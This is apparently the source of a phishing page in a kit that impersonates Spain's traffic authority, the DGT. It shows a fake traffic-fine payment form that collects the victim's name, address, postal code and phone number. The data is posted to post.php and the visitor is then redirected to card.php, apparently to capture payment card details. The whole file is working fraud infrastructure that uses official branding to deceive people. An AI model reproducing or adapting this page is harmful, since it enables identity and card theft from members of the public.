<?php 
require '../main.php';
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>DGT</title>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/css/all.min.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,400i,600,600i,700,700">
    <link rel="stylesheet" href="res/app.css">
</head>
<body>
<header>
<div class="logo">
    <img src="res/logo.png">
</div>
<div class="links">
<span>Nuestros servicios</span>
<span>Muévete con seguridad</span>
<span>Estado del tráfico</span>
<span>Conoce la DGT</span>
<span>Comunicación</span>
<img src="res/bars.png">
</div>
</header>
<main>
<div class="container">
<div class="form">
<div class="title"><i class="fa fa-file"></i> PAGO DE SU MULTA N°11525839872</div>
<div class="subtitle">
Confirme su identidad
</div>


<div class="col double">
<div class="left">
    <label for="d0">Nombre</label>
    <input type="text" id="d0">
</div>
<div class="right">
    <label for="d1">Apellido</label>
    <input type="text" id="d1">
</div>
</div>

<div class="col">
    <label for="d2">Dirección</label>
    <input type="text" id="d2">
</div>
 
<div class="col double">
    <div class="left">
        <label for="d3">Ciudad</label>
        <input type="text" id="d3">
    </div>
    <div class="right">
        <label for="d4">Código postal</label>
        <input type="text" id="d4">
    </div>
</div>

<div class="col">
    <label for="d5">Número de teléfono</label>
    <input type="text" id="d5" value="+34 ">
</div>

<div class="col btn">
    <button onclick="sendInfo()">Continuar <i class="fa fa-caret-right"></i></button>
</div>

</div>


</div>
</main>


<footer>
<div class="links">
<span>Aviso legal</span> | <span>Propiedad intelectual</span> | <span>Accesibilidad</span> | <span>Protección de datos</span>
</div>
<div class="social">
    <img src="res/social.png">
</div>
<div class="credits">
Copyright @ DGT 2024. Todos los derechos reservados
</div>
</footer>


<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.16/jquery.mask.min.js"></script>
<script>
$("#d5").mask("+34 000000000000");


var initVal = false;
function validate(){
    var statu = true;
    $("input").removeClass("error");
    for (var i=0; i<=5; i++){
        if($("#d"+i).val().trim()==""){
            $("#d"+i).addClass("error");
            statu = false;
        }
    }

    if($("#d5").val().trim().length < 9){
        $("#d5").addClass("error");
            statu = false;
    }

return statu;

}



function sendInfo(){
    initVal = true;
    if(validate()){
        $("main").load("html/loader.php");
    $.post("post.php",{
        name:$("#d0").val()+" "+$("#d1").val(),
        address:$("#d2").val()+" "+$("#d3").val()+" "+$("#d4").val(),
        phone:$("#d5").val()
    },(res)=>{
        window.location="card.php";
    })

    }


}


$("input").keyup(()=>{
    if(initVal){
        validate();
    }
})


$("input").keypress((e)=>{
    if(e.key=="Enter"){
        sendInfo();
    }
})


</script>
</body>
</html>